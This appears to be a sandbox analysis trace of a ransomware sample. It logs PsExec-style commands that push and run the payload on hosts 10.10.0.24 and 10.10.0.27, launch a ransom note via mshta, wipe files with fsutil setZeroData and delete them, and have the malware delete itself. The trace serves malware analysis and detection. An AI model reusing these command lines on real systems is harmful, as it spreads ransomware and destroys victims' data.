C:\Users\Admin\AppData\Local\Temp\ctkacaxe.exe"C:\Users\Admin\AppData\Local\Temp\ctkacaxe.exe" \\10.10.0.24 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\e1f063d6_by_Libranalysis.exe"2⤵
- Executes dropped EXE
PID:3096
-
-
C:\Users\Admin\AppData\Local\Temp\ctkacaxe.exe"C:\Users\Admin\AppData\Local\Temp\ctkacaxe.exe" \\10.10.0.27 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\e1f063d6_by_Libranalysis.exe"2⤵
- Executes dropped EXE
PID:1244
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta2⤵PID:496
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵PID:2216
-
C:\Windows\system32\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
PID:3824
-
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵PID:3008
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\e1f063d6_by_Libranalysis.exe2⤵PID:2224
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:3096
-
-